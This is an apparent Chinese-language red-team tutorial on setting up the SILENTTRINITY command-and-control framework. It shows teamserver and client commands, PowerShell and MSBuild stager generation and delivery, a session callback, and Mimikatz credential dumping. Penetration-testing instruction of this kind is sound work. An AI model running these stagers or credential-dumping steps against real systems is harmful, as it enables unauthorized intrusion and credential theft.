我的SILENTTRINITY初体验

TL;DR
SILENTTRINITY（ST）在2019年7月多次成为新闻焦点，我想探究其备受关注的原因。本文提供足够信息帮助安装ST、运行团队服务器并连接客户端。完成基础配置后，我们将深入实战操作。

环境准备

• Digital Ocean $10/月 Ubuntu 19.10节点
• 用于渗透的Windows主机
• 执行渗透测试的合法权限

安装步骤

安装过程中常会遇到问题，但以下是我稳定的安装流程：

1
2
3
4
5
6
7

git clone https://github.com/byt3bl33d3r/SILENTTRINITY
apt update && apt upgrade
apt install python3.7 python3.7-dev python3-pip
sudo -H pip3 install -U pipenv
cd SILENTTRINITY
pip3 install -r requirements.txt
pipenv install && pipenv shell

实战演练

假设Windows域标准用户点击恶意链接或执行HTA文件，该用户具有非管理员权限，增加了权限提升难度。本文展示基础用法并拓展知识边界。

启动团队服务器

出于操作安全考虑，应使用分类域名运行服务器，通过防火墙限制监听服务访问，并注意监听器可能存在的漏洞。

1

python st.py teamserver --port 81 10.10.98.228 BadPassword123

执行后应返回证书指纹和服务器运行确认信息。

客户端连接

红队操作中，服务器通常运行在云服务或VPS上，并通过代理/VPN连接。此处直接在本地tmux面板连接：

1
2
3

pwd
pipenv install && pipenv shell
python st.py client wss://aptclass:BadPassword123@10.10.98.228:81

连接成功后的启动界面：

监听器配置

1
2

listeners
use https

HTTPS监听器选项菜单：

载荷生成

PowerShell选项配置和上下文标签补全功能：

1
2

stagers
options

快速生成恶意载荷：

1
2
3

stagers
powershell
generate https

以及：

1
2
3

stagers
msbuild
generate https

stager.ps1文件生成在/opt/SILENTTRINITY/目录，可直接执行。使用Python快速搭建Web服务器：

1

python -m http.server

1

Msbuild.exe stager.xml

成功获取会话：

渗透后续操作

在控制SIEM和Sysmon的环境中，通过Kibana过滤端点Sysmon日志（event_id:3）可发现被入侵主机、进程和目标IP地址。

继续探索进程验证和完整性检查（缺乏管理员权限时读取进程细节可能成为IoC）：

1
2
3

modules
use boo/ps
run <会话ID>

已获得特权shell，游戏结束。

执行Mimikatz：

1
2

use boo/mimikatz
run <会话ID>

感谢阅读！

参考链接

• ST: https://github.com/byt3bl33d3r/SILENTTRINITY
• ZDNet: https://www.zdnet.com/article/croatian-government-targeted-by-mysterious-hackers/
• SCMag: https://www.scmagazineuk.com/entirely-new-malware-silenttrinity-attacks-croatian-government/article/1590225
• 团队服务器安全: https://github.com/byt3bl33d3r/SILENTTRINITY/wiki/Teamserver-Security-Considerations-Guidelines